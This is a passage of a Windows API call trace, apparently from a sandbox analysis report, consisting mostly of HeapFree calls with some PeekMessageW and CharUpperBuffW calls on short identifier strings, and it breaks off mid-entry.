HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.153] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.153] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.154] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.154] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.155] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.156] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0261.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.158] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.159] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.159] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.159] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.160] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.160] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.160] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: 